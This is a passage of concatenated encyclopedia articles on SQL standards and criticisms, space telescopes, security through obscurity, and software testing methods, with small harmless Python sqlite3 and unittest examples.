SQL is designed for a specific purpose: to query data contained in a relational database. SQL is a set-based, declarative programming language, not an imperative programming language like C or BASIC. However, extensions to Standard SQL add procedural programming language functionality, such as control-of-flow constructs. In addition to the standard SQL/PSM extensions and proprietary SQL extensions, procedural and object-oriented programmability is available on many SQL platforms via DBMS integration with other languages. The SQL standard defines SQL/JRT extensions (SQL Routines and Types for the Java Programming Language) to support Java code in SQL databases. Microsoft SQL Server 2005 uses the SQLCLR (SQL Server Common Language Runtime) to host managed .NET assemblies in the database, while prior versions of SQL Server were restricted to unmanaged extended stored procedures primarily written in C. PostgreSQL lets users write functions in a wide variety of languages, including Perl, Python, Tcl, JavaScript (PL/V8) and C.

Interoperability and standardization

Overview
SQL implementations are incompatible between vendors and do not necessarily completely follow standards. In particular, date and time syntax, string concatenation, NULLs, and comparison case sensitivity vary from vendor to vendor. PostgreSQL and Mimer SQL strive for standards compliance, though PostgreSQL does not adhere to the standard in all cases. For example, the folding of unquoted names to lower case in PostgreSQL is incompatible with the SQL standard, which says that unquoted names should be folded to upper case. Thus, according to the standard, Foo should be equivalent to FOO, not foo.

Popular implementations of SQL commonly omit support for basic features of Standard SQL, such as the DATE or TIME data types. The most obvious such examples, and incidentally the most popular commercial and proprietary SQL DBMSs, are Oracle (whose DATE behaves as DATETIME, and which lacks a TIME type) and MS SQL Server (before the 2008 version). As a result, SQL code can rarely be ported between database systems without modifications.
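String concatenation is a frequently cited example of such dialect differences. The sketch below runs the standard operator through Python's sqlite3 module; the alternative spellings noted in comments are the forms commonly documented for other systems, given here from general knowledge rather than executed:

    # The SQL standard concatenation operator is ||, which SQLite also accepts.
    import sqlite3

    conn = sqlite3.connect(":memory:")

    # Standard SQL / SQLite / PostgreSQL / Oracle:
    print(conn.execute("SELECT 'foo' || 'bar'").fetchone()[0])  # foobar

    # MySQL (where || is logical OR by default): SELECT CONCAT('foo', 'bar');
    # SQL Server (historically):                 SELECT 'foo' + 'bar';
    conn.close()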
Reasons for incompatibility
Several reasons for the lack of portability between database systems include:
The complexity and size of the SQL standard means that most implementers do not support the entire standard.
The SQL standard does not specify the database behavior in some important areas (e.g., indices, file storage), leaving implementations to decide how to behave.
The SQL standard defers some decisions to individual implementations, such as how to name a results column that was not named explicitly.
The SQL standard precisely specifies the syntax that a conforming database system must implement. However, the standard's specification of the semantics of language constructs is less well-defined, leading to ambiguity.
Many database vendors have large existing customer bases; where a newer version of the SQL standard conflicts with the prior behavior of the vendor's database, the vendor may be unwilling to break backward compatibility.
Little commercial incentive exists for vendors to make changing database suppliers easier (see vendor lock-in).
Users evaluating database software tend to place other factors such as performance higher in their priorities than standards conformance.

Standardization history
SQL was adopted as a standard by ANSI in 1986 as SQL-86 and by ISO in 1987. It is maintained by ISO/IEC JTC 1, Information technology, Subcommittee SC 32, Data management and interchange. Until 1996, the National Institute of Standards and Technology (NIST) data-management standards program certified SQL DBMS compliance with the SQL standard. Vendors now self-certify the compliance of their products. The original standard declared that the official pronunciation for "SQL" was an initialism: ("ess cue el"). Regardless, many English-speaking database professionals (including Donald Chamberlin himself) use the acronym-like pronunciation of ("sequel"), mirroring the language's prerelease development name, "SEQUEL". The SQL standard has gone through a number of revisions.

Current standard
The standard is commonly denoted by the pattern ISO/IEC 9075-n:yyyy Part n: title, or, as a shortcut, ISO/IEC 9075. Interested parties may purchase the standards documents from ISO, IEC, or ANSI. Some old drafts are freely available. ISO/IEC 9075 is complemented by ISO/IEC 13249: SQL Multimedia and Application Packages and some technical reports.

Alternatives
A distinction should be made between alternatives to SQL as a language, and alternatives to the relational model itself. Below are proposed relational alternatives to the SQL language. See navigational database and NoSQL for alternatives to the relational model.
.QL: object-oriented Datalog
4D Query Language (4D QL)
Datalog: critics suggest that Datalog has two advantages over SQL: it has cleaner semantics, which facilitates program understanding and maintenance, and it is more expressive, in particular for recursive queries (see the recursive-query sketch after this list)
HTSQL: URL-based query method
IBM Business System 12 (IBM BS12): one of the first fully relational database management systems, introduced in 1982
ISBL
jOOQ: SQL implemented in Java as an internal domain-specific language
Java Persistence Query Language (JPQL): the query language used by the Java Persistence API and Hibernate persistence library
JavaScript: MongoDB implements its query language in a JavaScript API
LINQ: runs SQL statements written like language constructs to query collections directly from inside .NET code
Object Query Language
QBE (Query By Example): created by Moshè Zloof, IBM 1977
QUEL: introduced in 1974 by the U.C. Berkeley Ingres project, closer to tuple relational calculus than SQL
XQuery
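As context for the Datalog comparison above: standard SQL has been able to express recursive queries since SQL:1999 through recursive common table expressions, though less directly than Datalog's native recursion. A sketch using sqlite3, with an invented parent/child table:

    # Transitive closure of a small hierarchy with a recursive CTE.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE org (parent TEXT, child TEXT)")
    conn.executemany("INSERT INTO org VALUES (?, ?)",
                     [("a", "b"), ("b", "c"), ("c", "d")])

    query = """
    WITH RECURSIVE descendants(node) AS (
        SELECT child FROM org WHERE parent = 'a'
        UNION
        SELECT org.child FROM org JOIN descendants ON org.parent = descendants.node
    )
    SELECT node FROM descendants
    """
    print([r[0] for r in conn.execute(query)])  # ['b', 'c', 'd'] (order may vary)
    conn.close()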
Distributed SQL processing
Distributed Relational Database Architecture (DRDA) was designed by a workgroup within IBM from 1988 to 1994. DRDA enables network-connected relational databases to cooperate to fulfill SQL requests. An interactive user or program can issue SQL statements to a local RDB and receive tables of data and status indicators in reply from remote RDBs. SQL statements can also be compiled and stored in remote RDBs as packages and then invoked by package name. This is important for the efficient operation of application programs that issue complex, high-frequency queries. It is especially important when the tables to be accessed are located in remote systems. The messages, protocols, and structural components of DRDA are defined by the Distributed Data Management Architecture. Distributed SQL processing à la DRDA is distinct from contemporary distributed SQL databases.

Criticisms

Design
SQL deviates in several ways from its theoretical foundation, the relational model and its tuple calculus. In that model, a table is a set of tuples, while in SQL, tables and query results are lists of rows; the same row may occur multiple times, and the order of rows can be employed in queries (e.g., in the LIMIT clause). Critics argue that SQL should be replaced with a language that returns strictly to the original foundation: for example, see The Third Manifesto by Hugh Darwen and C.J. Date (2006).

Orthogonality and completeness
Early specifications did not support major features, such as primary keys. Result sets could not be named, and subqueries had not been defined. These were added in 1992. The lack of sum types has been described as a roadblock to full use of SQL's user-defined types. JSON support, for example, needed to be added by a new standard in 2016.

Null
The concept of Null is the subject of some debate. The Null marker indicates the absence of a value, and is distinct from a value of 0 for an integer column or an empty string for a text column. Because of Nulls, comparisons and other operations in SQL follow a three-valued logic (true/false/unknown), a concrete implementation of general three-valued logic.

Duplicates
Another popular criticism is that SQL allows duplicate rows, which complicates integration with languages such as Python, whose data types might make accurately representing the data difficult, both when parsing results and in structuring programs modularly. This is usually avoided by declaring a primary key, or a unique constraint, with one or more columns that uniquely identify a row in the table.

Impedance mismatch
In a sense similar to object–relational impedance mismatch, a mismatch occurs between the declarative SQL language and the procedural languages in which SQL is typically embedded.
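The Null and duplicate-row behaviors criticized above can be observed directly when SQL is embedded in a procedural host language such as Python, itself an instance of the mismatch just described. The table and values are illustrative:

    # Three-valued logic and bag semantics, observed through sqlite3.
    import sqlite3

    conn = sqlite3.connect(":memory:")

    # NULL = NULL evaluates to unknown, surfaced to Python as None, not True.
    print(conn.execute("SELECT NULL = NULL").fetchone()[0])     # None
    print(conn.execute("SELECT NULL IS NULL").fetchone()[0])    # 1 (true)

    # Tables are bags, not sets: duplicates persist unless constrained away.
    conn.execute("CREATE TABLE t (x INTEGER)")
    conn.executemany("INSERT INTO t VALUES (?)", [(1,), (1,), (2,)])
    print(conn.execute("SELECT x FROM t").fetchall())           # [(1,), (1,), (2,)]
    print(conn.execute("SELECT DISTINCT x FROM t").fetchall())  # [(1,), (2,)]
    conn.close()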
SQL data types
The SQL standard defines three kinds of data types (chapter 4.1.1 of SQL/Foundation): predefined data types, constructed types, and user-defined types.

Constructed types are one of ARRAY, MULTISET, REF(erence), or ROW. User-defined types are comparable to classes in object-oriented languages, with their own constructors, observers, mutators, methods, inheritance, overloading, overwriting, interfaces, and so on. Predefined data types are intrinsically supported by the implementation.

Predefined data types
Character types: character (CHAR), character varying (VARCHAR), character large object (CLOB)
National character types: national character (NCHAR), national character varying (NCHAR VARYING), national character large object (NCLOB)
Binary types: binary (BINARY), binary varying (VARBINARY), binary large object (BLOB)
Numeric types: exact numeric types (NUMERIC, DECIMAL, SMALLINT, INTEGER, BIGINT), approximate numeric types (FLOAT, REAL, DOUBLE PRECISION), decimal floating-point type (DECFLOAT)
Datetime types (DATE, TIME, TIMESTAMP)
Interval type (INTERVAL)
Boolean
XML (see SQL/XML)
JSON
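A short sketch using several of the predefined types above in a table definition, run here through SQLite via Python's sqlite3 module. Note that SQLite applies flexible "type affinity" rather than strict typing, so stricter systems may enforce these declarations more rigorously; the table and values are invented:

    # A table declared with several standard-style predefined types.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("""
    CREATE TABLE measurement (
        id        INTEGER PRIMARY KEY,   -- exact numeric
        label     VARCHAR(40),           -- character varying
        reading   DOUBLE PRECISION,      -- approximate numeric
        taken_at  TIMESTAMP,             -- datetime
        valid     BOOLEAN                -- boolean
    )
    """)
    conn.execute("INSERT INTO measurement VALUES (1, 'probe-1', 3.14, '2024-01-01 12:00:00', 1)")
    print(conn.execute("SELECT label, reading FROM measurement").fetchone())  # ('probe-1', 3.14)
    conn.close()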
Technology
Data modeling languages
null
29006
https://en.wikipedia.org/wiki/Space%20telescope
Space telescope
A space telescope (also known as a space observatory) is a telescope in outer space used to observe astronomical objects. Suggested by Lyman Spitzer in 1946, the first operational telescopes were the American Orbiting Astronomical Observatory OAO-2, launched in 1968, and the Soviet Orion 1 ultraviolet telescope aboard the space station Salyut 1 in 1971.

Space telescopes avoid several problems caused by the atmosphere, including the absorption or scattering of certain wavelengths of light, obstruction by clouds, and distortions due to atmospheric refraction such as twinkling. Space telescopes can also observe dim objects during the daytime, and they avoid the light pollution which ground-based observatories encounter. They are divided into two types: satellites which map the entire sky (astronomical survey), and satellites which focus on selected astronomical objects or parts of the sky and beyond. Space telescopes are distinct from Earth imaging satellites, which point toward Earth for satellite imaging, applied for weather analysis, espionage, and other types of information gathering.

History
In 1946, the American theoretical astrophysicist Lyman Spitzer, the "father of Hubble", proposed putting a telescope in space. Spitzer's proposal called for a large telescope that would not be hindered by Earth's atmosphere. After lobbying in the 1960s and 70s for such a system to be built, Spitzer's vision ultimately materialized into the Hubble Space Telescope, which was launched on April 24, 1990, by the Space Shuttle Discovery (STS-31). Its launch owed much to the efforts of Nancy Grace Roman, the "mother of Hubble", who was the first Chief of Astronomy and the first female executive at NASA. She was a program scientist who worked to convince NASA, Congress, and others that Hubble was "very well worth doing". The first operational space telescopes were the American Orbiting Astronomical Observatory OAO-2, launched in 1968, and the Soviet Orion 1 ultraviolet telescope aboard the space station Salyut 1 in 1971.

Advantages
Performing astronomy from ground-based observatories on Earth is limited by the filtering and distortion of electromagnetic radiation (scintillation or twinkling) due to the atmosphere. A telescope orbiting Earth outside the atmosphere is subject neither to twinkling nor to light pollution from artificial light sources on Earth. As a result, the angular resolution of space telescopes is often much higher than that of a ground-based telescope with a similar aperture. Many larger terrestrial telescopes, however, reduce atmospheric effects with adaptive optics.

Space-based astronomy is more important for frequency ranges that are outside the optical window and the radio window, the only two wavelength ranges of the electromagnetic spectrum that are not severely attenuated by the atmosphere. For example, X-ray astronomy is nearly impossible when done from Earth, and has reached its current importance in astronomy only due to orbiting X-ray telescopes such as the Chandra X-ray Observatory and the XMM-Newton observatory. Infrared and ultraviolet are also largely blocked.

Disadvantages
Space telescopes are much more expensive to build than ground-based telescopes. Due to their location, space telescopes are also extremely difficult to maintain. The Hubble Space Telescope was serviced by the Space Shuttle, but most space telescopes cannot be serviced at all.
Future of space observatories
Satellites have been launched and operated by NASA, ISRO, ESA, CNSA, JAXA and the Soviet space program (later succeeded by Roscosmos of Russia). As of 2022, many space observatories have already completed their missions, while others continue operating on extended time. However, the future availability of space telescopes and observatories depends on timely and sufficient funding. While future space observatories are planned by NASA, JAXA and the CNSA, scientists fear that there will be gaps in coverage that are not filled immediately by future projects, and that this will affect research in fundamental science. On 16 January 2023, NASA announced preliminary considerations of several future space telescope programs, including the Great Observatory Technology Maturation Program, Habitable Worlds Observatory, and New Great Observatories.

List of space telescopes
Technology
Telescope
null
29087
https://en.wikipedia.org/wiki/Security%20through%20obscurity
Security through obscurity
In security engineering, security through obscurity is the practice of concealing the details or mechanisms of a system to enhance its security. This approach relies on the principle of hiding something in plain sight, akin to a magician's sleight of hand or the use of camouflage. It diverges from traditional security methods, such as physical locks, and is more about obscuring information or characteristics to deter potential threats. Examples of this practice include disguising sensitive information within commonplace items, like a piece of paper in a book, or altering digital footprints, such as spoofing a web browser's version number. While not a standalone solution, security through obscurity can complement other security measures in certain scenarios.

Obscurity in the context of security engineering is the notion that information can be protected, to a certain extent, when it is difficult to access or comprehend. This concept hinges on the principle of making the details or workings of a system less visible or understandable, thereby reducing the likelihood of unauthorized access or manipulation. Security by obscurity alone is discouraged and not recommended by standards bodies.

History
An early opponent of security through obscurity was the locksmith Alfred Charles Hobbs, who in 1851 demonstrated to the public how state-of-the-art locks could be picked. In response to concerns that exposing security flaws in the design of locks could make them more vulnerable to criminals, he said: "Rogues are very keen in their profession, and know already much more than we can teach them."

There is scant formal literature on the issue of security through obscurity. Books on security engineering cite Kerckhoffs' doctrine from 1883, if they cite anything at all. For example, in a discussion about secrecy and openness in nuclear command and control:

[T]he benefits of reducing the likelihood of an accidental war were considered to outweigh the possible benefits of secrecy. This is a modern reincarnation of Kerckhoffs' doctrine, first put forward in the nineteenth century, that the security of a system should depend on its key, not on its design remaining obscure.

Peter Swire has written about the trade-off between the notion that "security through obscurity is an illusion" and the military notion that "loose lips sink ships", as well as on how competition affects the incentives to disclose.

There are conflicting stories about the origin of this term. Fans of MIT's Incompatible Timesharing System (ITS) say it was coined in opposition to Multics users down the hall, for whom security was far more an issue than on ITS. Within the ITS culture, the term referred, self-mockingly, to the poor coverage of the documentation and the obscurity of many commands, and to the attitude that by the time a tourist figured out how to make trouble he'd generally got over the urge to make it, because he felt part of the community. One instance of deliberate security through obscurity on ITS has been noted: the command to allow patching the running ITS system (altmode altmode control-R) echoed as $$^D. Typing Alt Alt Control-D set a flag that would prevent patching the system even if the user later got it right.

In January 2020, NPR reported that Democratic Party officials in Iowa declined to share information regarding the security of their caucus app, to "make sure we are not relaying information that could be used against us."
Cybersecurity experts replied that "to withhold the technical details of its app doesn't do much to protect the system."

Criticism
Security by obscurity alone is discouraged and not recommended by standards bodies. The National Institute of Standards and Technology (NIST) in the United States recommends against this practice: "System security should not depend on the secrecy of the implementation or its components." The Common Weakness Enumeration project lists "Reliance on Security Through Obscurity" as CWE-656.

A large number of telecommunication and digital rights management cryptosystems use security through obscurity, but have ultimately been broken. These include components of GSM, GMR encryption, GPRS encryption, a number of RFID encryption schemes, and most recently Terrestrial Trunked Radio (TETRA).

One of the largest proponents of security through obscurity commonly seen today is anti-malware software. What typically occurs with this single point of failure, however, is an arms race of attackers finding novel ways to avoid detection and defenders coming up with increasingly contrived but secret signatures to flag on.

The technique stands in contrast with security by design and open security, although many real-world projects include elements of all strategies.

Obscurity in architecture vs. technique
Knowledge of how the system is built differs from concealment and camouflage. The effectiveness of obscurity in operations security depends on whether the obscurity lives on top of other good security practices, or if it is being used alone. When used as an independent layer, obscurity is considered a valid security tool. In recent years, more advanced versions of "security through obscurity" have gained support as a methodology in cybersecurity through Moving Target Defense and cyber deception. NIST's cyber resiliency framework, 800-160 Volume 2, recommends the usage of security through obscurity as a complementary part of a resilient and secure computing environment.
Technology
Computer security
null
29090
https://en.wikipedia.org/wiki/Software%20testing
Software testing
Software testing is the act of checking whether software satisfies expectations. Software testing can provide objective, independent information about the quality of software and the risk of its failure to a user or sponsor. Software testing can determine the correctness of software for specific scenarios but cannot determine correctness for all scenarios. It cannot find all bugs.

Based on the criteria for measuring correctness from an oracle, software testing employs principles and mechanisms that might recognize a problem. Examples of oracles include specifications, contracts, comparable products, past versions of the same product, inferences about intended or expected purpose, user or customer expectations, relevant standards, and applicable laws.

Software testing is often dynamic in nature: running the software to verify that actual output matches expected output. It can also be static in nature: reviewing code and its associated documentation. Software testing is often used to answer the question: does the software do what it is supposed to do and what it needs to do? Information learned from software testing may be used to improve the process by which software is developed. Software testing should follow a "pyramid" approach wherein most tests are unit tests, followed by integration tests, with end-to-end (e2e) tests having the lowest proportion.

Economics
A study conducted by NIST in 2002 reported that software bugs cost the U.S. economy $59.5 billion annually. More than a third of this cost could be avoided if better software testing was performed. Outsourcing software testing because of costs is very common, with China, the Philippines, and India being preferred destinations.

History
Glenford J. Myers initially introduced the separation of debugging from testing in 1979. Although his attention was on breakage testing ("A successful test case is one that detects an as-yet undiscovered error."), it illustrated the desire of the software engineering community to separate fundamental development activities, such as debugging, from that of verification.

Goals
Software testing is typically goal driven.

Finding bugs
Software testing typically includes handling software bugs: defects in the code that cause undesirable results. Bugs generally slow testing progress and involve programmer assistance to debug and fix. Not all defects cause a failure. For example, a defect in dead code will not be considered a failure. A defect that does not cause failure at one point in time may later occur due to environmental changes. Examples of environment change include running on new computer hardware, changes in data, and interacting with different software. A single defect may result in multiple failure symptoms.

Ensuring requirements are satisfied
Software testing may involve a requirements gap: an omission from the design for a requirement. Requirement gaps can often be non-functional requirements such as testability, scalability, maintainability, performance, and security.

Code coverage
A fundamental limitation of software testing is that testing under all combinations of inputs and preconditions (initial state) is not feasible, even with a simple product. Defects that manifest in unusual conditions are difficult to find in testing. Also, non-functional dimensions of quality (how it is supposed to be versus what it is supposed to do), such as usability, scalability, performance, compatibility, and reliability, can be subjective; something that constitutes sufficient value to one person may not to another. Although testing for every possible input is not feasible, testing can use combinatorics to maximize coverage while minimizing tests.
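As a sketch of that idea, the following toy example (parameter names and values are invented) compares the exhaustive test matrix for four configuration parameters against a greedy all-pairs selection that still covers every pair of parameter values. It illustrates the principle; it is not a production pairwise tool:

    # Shrinking a test matrix with combinatorics: cover every value pair.
    from itertools import combinations, product

    params = {
        "os":      ["linux", "windows", "macos"],
        "browser": ["firefox", "chrome"],
        "locale":  ["en", "de", "ja"],
        "proto":   ["http", "https"],
    }
    names = list(params)

    def pairs(case):
        # All (parameter, value) pairs covered by one test case.
        items = list(zip(names, case))
        return set(combinations(items, 2))

    all_cases = list(product(*params.values()))
    uncovered = set().union(*(pairs(c) for c in all_cases))

    suite = []
    while uncovered:
        # Greedily pick the case covering the most still-uncovered pairs.
        best = max(all_cases, key=lambda c: len(pairs(c) & uncovered))
        suite.append(best)
        uncovered -= pairs(best)

    print(len(all_cases), "exhaustive cases vs", len(suite), "pairwise cases")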
Categorization
Testing can be categorized many ways.

Automated testing

Levels
Software testing can be categorized into levels based on how much of the software system is the focus of a test:
Unit testing
Integration testing
System testing

Static, dynamic, and passive testing
There are many approaches to software testing. Reviews, walkthroughs, or inspections are referred to as static testing, whereas executing programmed code with a given set of test cases is referred to as dynamic testing. Static testing is often implicit, like proofreading, plus when programming tools/text editors check source code structure or compilers (pre-compilers) check syntax and data flow as static program analysis. Dynamic testing takes place when the program itself is run. Dynamic testing may begin before the program is 100% complete in order to test particular sections of code; such tests are applied to discrete functions or modules. Typical techniques for these are either using stubs/drivers or execution from a debugger environment. Static testing involves verification, whereas dynamic testing also involves validation.

Passive testing means verifying the system's behavior without any interaction with the software product. Contrary to active testing, testers do not provide any test data but look at system logs and traces. They mine for patterns and specific behavior in order to make some kind of decisions. This is related to offline runtime verification and log analysis.

Exploratory

Preset testing vs adaptive testing
The type of testing strategy to be performed depends on whether the tests to be applied to the implementation under test (IUT) should be decided before the testing plan starts to be executed (preset testing) or whether each input to be applied to the IUT can be dynamically dependent on the outputs obtained during the application of the previous tests (adaptive testing).

Black/white box
Software testing can often be divided into white-box and black-box. These two approaches are used to describe the point of view that the tester takes when designing test cases. A hybrid approach called grey-box that includes aspects of both boxes may also be applied to software testing methodology.

White-box testing
White-box testing (also known as clear box testing, glass box testing, transparent box testing, and structural testing) verifies the internal structures or workings of a program, as opposed to the functionality exposed to the end-user. In white-box testing, an internal perspective of the system (the source code), as well as programming skills, are used to design test cases. The tester chooses inputs to exercise paths through the code and determines the appropriate outputs. This is analogous to testing nodes in a circuit, e.g., in-circuit testing (ICT). While white-box testing can be applied at the unit, integration, and system levels of the software testing process, it is usually done at the unit level. It can test paths within a unit, paths between units during integration, and between subsystems during a system-level test. Though this method of test design can uncover many errors or problems, it might not detect unimplemented parts of the specification or missing requirements.
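A minimal white-box sketch, with an invented function under test: the tester reads the implementation and picks inputs that force each branch of the code:

    # White-box testing: inputs chosen by reading the source of the unit.
    import unittest

    def classify(age):
        # Code under test: two branches.
        if age < 18:
            return "minor"
        return "adult"

    class ClassifyBranches(unittest.TestCase):
        def test_minor_branch(self):
            self.assertEqual(classify(17), "minor")   # exercises the if-branch

        def test_adult_branch(self):
            self.assertEqual(classify(18), "adult")   # exercises the fall-through

    if __name__ == "__main__":
        unittest.main()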
Techniques used in white-box testing include:
API testing – testing of the application using public and private APIs (application programming interfaces)
Code coverage – creating tests to satisfy some criteria of code coverage (for example, the test designer can create tests to cause all statements in the program to be executed at least once)
Fault injection methods – intentionally introducing faults to gauge the efficacy of testing strategies
Mutation testing methods
Static testing methods

Code coverage tools can evaluate the completeness of a test suite that was created with any method, including black-box testing. This allows the software team to examine parts of a system that are rarely tested and ensures that the most important function points have been tested. Code coverage as a software metric can be reported as a percentage for:
Function coverage, which reports on functions executed
Statement coverage, which reports on the number of lines executed to complete the test
Decision coverage, which reports on whether both the True and the False branch of a given test has been executed

100% statement coverage ensures that every statement is executed at least once, but does not by itself guarantee that every branch or path through the control flow is taken. Coverage is helpful in ensuring correct functionality, but not sufficient, since the same code may process different inputs correctly or incorrectly.

Black-box testing
Black-box testing (also known as functional testing) describes designing test cases without knowledge of the implementation, without reading the source code. The testers are only aware of what the software is supposed to do, not how it does it. Black-box testing methods include: equivalence partitioning, boundary value analysis, all-pairs testing, state transition tables, decision table testing, fuzz testing, model-based testing, use case testing, exploratory testing, and specification-based testing.

Specification-based testing aims to test the functionality of software according to the applicable requirements. This level of testing usually requires thorough test cases to be provided to the tester, who then can simply verify that for a given input, the output value (or behavior) either "is" or "is not" the same as the expected value specified in the test case. Test cases are built around specifications and requirements, i.e., what the application is supposed to do. It uses external descriptions of the software, including specifications, requirements, and designs, to derive test cases. These tests can be functional or non-functional, though usually functional. Specification-based testing may be necessary to assure correct functionality, but it is insufficient to guard against complex or high-risk situations. Black-box testing can be used at any level of testing, although usually not at the unit level.

Component interface testing
Component interface testing is a variation of black-box testing, with the focus on the data values beyond just the related actions of a subsystem component. The practice of component interface testing can be used to check the handling of data passed between various units, or subsystem components, beyond full integration testing between those units. The data being passed can be considered as "message packets", and the range or data types can be checked for data generated from one unit and tested for validity before being passed into another unit. One option for interface testing is to keep a separate log file of data items being passed, often with a timestamp logged to allow analysis of thousands of cases of data passed between units for days or weeks. Tests can include checking the handling of some extreme data values while other interface variables are passed as normal values. Unusual data values in an interface can help explain unexpected performance in the next unit.
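A small sketch of that idea, with invented packet fields and limits: data crossing the boundary between two units is checked for type and range, including one extreme value while the other field stays normal:

    # Component interface testing: validate data at the unit boundary.
    def validate_packet(packet):
        # Interface contract between the producer and consumer units.
        assert isinstance(packet["sensor_id"], int)
        assert 0 <= packet["sensor_id"] < 1024
        assert isinstance(packet["reading"], float)
        assert -273.15 <= packet["reading"] <= 1000.0
        return packet

    # Normal values pass the boundary check...
    validate_packet({"sensor_id": 7, "reading": 21.5})

    # ...while an extreme reading, with the other field normal, is rejected.
    try:
        validate_packet({"sensor_id": 7, "reading": 1e9})
    except AssertionError:
        print("extreme reading caught at the interface")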
One option for interface testing is to keep a separate log file of data items being passed, often with a timestamp logged to allow analysis of thousands of cases of data passed between units for days or weeks. Tests can include checking the handling of some extreme data values while other interface variables are passed as normal values. Unusual data values in an interface can help explain unexpected performance in the next unit. Visual testing The aim of visual testing is to provide developers with the ability to examine what was happening at the point of software failure by presenting the data in such a way that the developer can easily find the information he or she requires, and the information is expressed clearly. At the core of visual testing is the idea that showing someone a problem (or a test failure), rather than just describing it, greatly increases clarity and understanding. Visual testing, therefore, requires the recording of the entire test process – capturing everything that occurs on the test system in video format. Output videos are supplemented by real-time tester input via picture-in-a-picture webcam and audio commentary from microphones. Visual testing provides a number of advantages. The quality of communication is increased drastically because testers can show the problem (and the events leading up to it) to the developer as opposed to just describing it, and the need to replicate test failures will cease to exist in many cases. The developer will have all the evidence he or she requires of a test failure and can instead focus on the cause of the fault and how it should be fixed. Ad hoc testing and exploratory testing are important methodologies for checking software integrity because they require less preparation time to implement, while the important bugs can be found quickly. In ad hoc testing, where testing takes place in an improvised impromptu way, the ability of the tester(s) to base testing off documented methods and then improvise variations of those tests can result in a more rigorous examination of defect fixes. However, unless strict documentation of the procedures is maintained, one of the limits of ad hoc testing is lack of repeatability. Grey-box testing Grey-box testing (American spelling: gray-box testing) involves using knowledge of internal data structures and algorithms for purposes of designing tests while executing those tests at the user, or black-box level. The tester will often have access to both "the source code and the executable binary." Grey-box testing may also include reverse engineering (using dynamic code analysis) to determine, for instance, boundary values or error messages. Manipulating input data and formatting output do not qualify as grey-box, as the input and output are clearly outside of the "black box" that we are calling the system under test. This distinction is particularly important when conducting integration testing between two modules of code written by two different developers, where only the interfaces are exposed for the test. By knowing the underlying concepts of how the software works, the tester makes better-informed testing choices while testing the software from outside. Typically, a grey-box tester will be permitted to set up an isolated testing environment with activities, such as seeding a database. 
The tester can observe the state of the product being tested after performing certain actions such as executing SQL statements against the database and then executing queries to ensure that the expected changes have been reflected. Grey-box testing implements intelligent test scenarios based on limited information. This will particularly apply to data type handling, exception handling, and so on. With the concept of grey-box testing, this "arbitrary distinction" between black- and white-box testing has faded somewhat. Installation testing Compatibility testing A common cause of software failure (real or perceived) is a lack of its compatibility with other application software, operating systems (or operating system versions, old or new), or target environments that differ greatly from the original (such as a terminal or GUI application intended to be run on the desktop now being required to become a Web application, which must render in a Web browser). For example, in the case of a lack of backward compatibility, this can occur because the programmers develop and test software only on the latest version of the target environment, which not all users may be running. This results in the unintended consequence that the latest work may not function on earlier versions of the target environment, or on older hardware that earlier versions of the target environment were capable of using. Sometimes such issues can be fixed by proactively abstracting operating system functionality into a separate program module or library. Smoke and sanity testing Sanity testing determines whether it is reasonable to proceed with further testing. Smoke testing consists of minimal attempts to operate the software, designed to determine whether there are any basic problems that will prevent it from working at all. Such tests can be used as build verification test. Regression testing Regression testing focuses on finding defects after a major code change has occurred. Specifically, it seeks to uncover software regressions, as degraded or lost features, including old bugs that have come back. Such regressions occur whenever software functionality that was previously working correctly, stops working as intended. Typically, regressions occur as an unintended consequence of program changes, when the newly developed part of the software collides with the previously existing code. Regression testing is typically the largest test effort in commercial software development, due to checking numerous details in prior software features, and even new software can be developed while using some old test cases to test parts of the new design to ensure prior functionality is still supported. Common methods of regression testing include re-running previous sets of test cases and checking whether previously fixed faults have re-emerged. The depth of testing depends on the phase in the release process and the risk of the added features. They can either be complete, for changes added late in the release or deemed to be risky, or be very shallow, consisting of positive tests on each feature, if the changes are early in the release or deemed to be of low risk. Acceptance testing Acceptance testing is system-level testing to ensure the software meets customer expectations. Acceptance testing may be performed as part of the hand-off process between any two phases of development. Tests are frequently grouped into these levels by where they are performed in the software development process, or by the level of specificity of the test. 
User acceptance testing (UAT) Operational acceptance testing (OAT) Contractual and regulatory acceptance testing Alpha and beta testing Sometimes, UAT is performed by the customer, in their environment and on their own hardware. OAT is used to conduct operational readiness (pre-release) of a product, service or system as part of a quality management system. OAT is a common type of non-functional software testing, used mainly in software development and software maintenance projects. This type of testing focuses on the operational readiness of the system to be supported, or to become part of the production environment. Hence, it is also known as operational readiness testing (ORT) or operations readiness and assurance (OR&A) testing. Functional testing within OAT is limited to those tests that are required to verify the non-functional aspects of the system. In addition, the software testing should ensure that the portability of the system, as well as working as expected, does not also damage or partially corrupt its operating environment or cause other processes within that environment to become inoperative. Contractual acceptance testing is performed based on the contract's acceptance criteria defined during the agreement of the contract, while regulatory acceptance testing is performed based on the relevant regulations to the software product. Both of these two tests can be performed by users or independent testers. Regulation acceptance testing sometimes involves the regulatory agencies auditing the test results. Alpha testing Alpha testing is simulated or actual operational testing by potential users/customers or an independent test team at the developers' site. Alpha testing is often employed for off-the-shelf software as a form of internal acceptance testing before the software goes to beta testing. Beta testing Beta testing comes after alpha testing and can be considered a form of external user acceptance testing. Versions of the software, known as beta versions, are released to a limited audience outside of the programming team known as beta testers. The software is released to groups of people so that further testing can ensure the product has few faults or bugs. Beta versions can be made available to the open public to increase the feedback field to a maximal number of future users and to deliver value earlier, for an extended or even indefinite period of time (perpetual beta). Functional vs non-functional testing Functional testing refers to activities that verify a specific action or function of the code. These are usually found in the code requirements documentation, although some development methodologies work from use cases or user stories. Functional tests tend to answer the question of "can the user do this" or "does this particular feature work." Non-functional testing refers to aspects of the software that may not be related to a specific function or user action, such as scalability or other performance, behavior under certain constraints, or security. Testing will determine the breaking point, the point at which extremes of scalability or performance leads to unstable execution. Non-functional requirements tend to be those that reflect the quality of the product, particularly in the context of the suitability perspective of its users. Continuous testing Continuous testing is the process of executing automated tests as part of the software delivery pipeline to obtain immediate feedback on the business risks associated with a software release candidate. 
